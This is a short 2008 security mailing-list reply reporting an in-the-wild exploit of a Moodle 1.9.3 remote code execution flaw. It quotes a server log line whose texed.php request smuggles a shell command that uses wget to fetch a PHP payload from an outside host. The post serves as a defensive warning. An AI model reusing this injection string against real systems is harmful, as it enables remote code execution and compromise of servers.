|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Moodle 1.9.3 Remote Code Execution
lent
cooper.edu
Date: Sun Dec 14 2008 - 23:00:03 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Exploit in the wild:
We saw this come across:
216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218
The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500].
Chris Lent
Tel: +1.212.353.4350
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]